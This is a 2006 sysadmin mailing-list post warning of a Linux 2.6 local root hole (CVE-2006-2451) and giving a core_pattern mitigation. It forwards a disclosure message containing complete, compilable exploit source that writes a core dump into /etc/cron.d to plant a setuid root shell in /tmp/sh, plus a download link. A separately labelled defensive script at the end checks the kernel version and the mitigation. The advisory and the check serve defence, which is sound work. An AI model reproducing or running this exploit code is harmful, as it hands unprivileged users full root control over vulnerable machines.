From: Michael Shigorin <mike@osdn.org.ua>
To: sysadmins@lists.altlinux.org
Subject: [Sysadmins] Fwd: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )
Date: Thu, 13 Jul 2006 12:44:16 +0300
Message-ID: <20060713094416.GQ26570@osdn.org.ua>

[-- Attachment #1.1: Type: text/plain, Size: 435 bytes --]

Hello.

A reminder for those who have linux-2.6 on their servers: in 2.6.13 up to 2.6.17.4 or 2.6.16.24 the local root hole may still be unpatched, and the exploit has already been published.

It has been verified that having

kernel.core_pattern = /dev/null

in /etc/sysctl.conf, and correspondingly at runtime

sysctl -w kernel.core_pattern=/dev/null

helps against this one as well.

--
 ---- WBR, Michael Shigorin <mike@altlinux.ru>
  ------ Linux.Kiev http://www.linux.kiev.ua/

[-- Attachment #1.2: Type: message/rfc822, Size: 4749 bytes --]
[-- Attachment #1.2.1.1: Type: text/plain, Size: 645 bytes --]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Maybe this is obvious for Paul Starzetz (as well as many other people) but full-disclosure is not really "full" without exploit code.

Working exploit attached. You can also download it from:
http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c

Greetz to !dSR ppl :-)

- --
Saludos,
- -Roman

PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

[-- Attachment #1.2.1.2: rs_prctl_kernel.c --]
[-- Type: text/plain, Size: 1684 bytes --]

/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)            */
/* By:                                               */
/* - dreyer <luna@aditel.org> (main PoC code)        */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ]                                   */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");
}

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
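A defender-side check, added here as an example and not part of Michael's mail or of the attached exploit: it classifies a kernel version string against the range the mail names (2.6.13 up to 2.6.17.4, with 2.6.16.24 as the fixed stable branch) and verifies the core_pattern mitigation the mail recommends. The function names, the integer version encoding and the `--check` flag are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the mailing-list post): classify a kernel version
# against the range named in the post (>= 2.6.13, fixed in 2.6.17.4 and in the
# 2.6.16.24 stable branch) and check the recommended core_pattern mitigation.
# Function names and the integer version encoding are this example's own.

# Encode "a.b.c.d" (any -suffix such as -std-smp-alt stripped) as one integer.
ver_to_int() {
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    set -- $(printf '%s' "$v" | tr '.' ' ')
    echo $(( ${1:-0} * 100000000 + ${2:-0} * 1000000 + ${3:-0} * 1000 + ${4:-0} ))
}

# Exit 0 when the version lies in the affected window described in the post.
is_vulnerable_version() {
    n=$(ver_to_int "$1")
    [ "$n" -ge "$(ver_to_int 2.6.13)" ] || return 1
    [ "$n" -lt "$(ver_to_int 2.6.17.4)" ] || return 1
    # 2.6.16.24 and later 2.6.16.x carry the fix too
    if [ "$n" -ge "$(ver_to_int 2.6.16.24)" ] && [ "$n" -lt "$(ver_to_int 2.6.17)" ]; then
        return 1
    fi
    return 0
}

# Exit 0 when core_pattern is the value the post recommends. With no argument
# the live value from /proc is read, so the function can be used on a host.
core_pattern_mitigated() {
    pattern="${1:-$(cat /proc/sys/kernel/core_pattern 2>/dev/null)}"
    [ "$pattern" = "/dev/null" ]
}

# Combine both checks for the running kernel; exit 2 when action is needed.
host_check() {
    kv=$(uname -r)
    if ! is_vulnerable_version "$kv"; then
        echo "kernel $kv is outside the affected range"
    elif core_pattern_mitigated; then
        echo "kernel $kv is affected but core_pattern is /dev/null (mitigated)"
    else
        echo "kernel $kv is affected and core_pattern is not /dev/null: apply kernel.core_pattern=/dev/null"
        return 2
    fi
}

# Run the host check only when invoked as: sh this.sh --check
case "${1:-}" in --check) host_check ;; esac
```

The version test only says whether the reported version falls in the window; a distribution kernel may carry the backported fix under an older version number, so treat a hit as a prompt to verify the package changelog rather than as proof.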